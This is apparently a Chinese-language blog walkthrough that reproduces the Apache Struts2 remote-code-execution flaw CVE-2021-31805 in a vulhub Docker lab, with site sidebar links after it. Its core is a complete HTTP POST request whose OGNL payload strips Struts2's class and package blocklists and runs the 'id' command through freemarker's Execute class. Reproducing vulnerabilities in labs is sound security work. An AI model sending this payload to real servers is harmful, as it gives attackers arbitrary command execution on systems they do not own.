CVE-2021-31805 Apache struts2 (RCE)

CVE-2021-31805 Apache struts2 (RCE)

靶场环境搭建

┌──(root💀kali)-[/home/kali/vulhub/struts2/s2-061]
└─# docker-compose up -d          //开启靶场环境,此处处于下载环境并启动环境,若下载好环境即可启动。
Creating network "s2-061_default" with the default driver
Pulling struts2 (vulhub/struts2:2.5.25)...
2.5.25: Pulling from vulhub/struts2
756975cb9c7e: Pull complete
d77915b4e630: Pull complete
5f37a0a41b6b: Pull complete
96b2c1e36db5: Pull complete
27a2d52b526e: Pull complete
93a36defce60: Pull complete
9e2014d79b30: Pull complete
ac71d4ce2ce4: Pull complete
a2f817e4badf: Pull complete
62ac51b7362f: Pull complete
e12f6705ebbe: Pull complete
4f4fb700ef54: Pull complete
97ba98138d72: Pull complete
Digest: sha256:eaf49b95f2c178cca77d3c8454f79a4fe4ed4dd9d342c9e9a911e842565217d2
Status: Downloaded newer image for vulhub/struts2:2.5.25
Creating s2-061_struts2_1 ... done
                                                                                                        
┌──(root💀kali)-[/home/kali/vulhub/struts2/s2-061]
└─# docker ps               //查看docker环境启动相关信息,通过端口访问
CONTAINER ID   IMAGE                   COMMAND                  CREATED          STATUS          PORTS                                       NAMES
490d225c9a6d   vulhub/struts2:2.5.25   "/usr/local/bin/mvn-…"   14 seconds ago   Up 13 seconds   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   s2-061_struts2_1
                                                                                                        

在这里插入图片描述访问index.action
在这里插入图片描述
在重放模块中重放此请求方法,可成功执行代码 ”id“

POST /index.action HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 829

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

代码执行后的结果,此处我们可以清楚的看到 ”id“ 被成功执行!

在这里插入图片描述结束!!!

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-14 12:26:01       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-14 12:26:01       106 阅读
  3. 在Django里面运行非项目文件

    2024-04-14 12:26:01       87 阅读
  4. Python语言-面向对象

    2024-04-14 12:26:01       96 阅读

热门阅读

  1. Swift中的类

    2024-04-14 12:26:01       50 阅读
  2. python 有什么资格称为编程排行榜第一

    2024-04-14 12:26:01       183 阅读
  3. 6.0 MapReduce 使用

    2024-04-14 12:26:01       36 阅读
  4. Study Pyhton

    2024-04-14 12:26:01       39 阅读
  5. 23、Lua 学习笔记之一(初阶话题)

    2024-04-14 12:26:01       42 阅读
  6. Linux命令学习—linux 下的用户和组的管理(下)

    2024-04-14 12:26:01       43 阅读
  7. Python 字典组成的数组怎么进行去重?

    2024-04-14 12:26:01       47 阅读
  8. NLM、LLM、MLLM概述

    2024-04-14 12:26:01       116 阅读
  9. kafka_2.11-2.4.1单机安装

    2024-04-14 12:26:01       42 阅读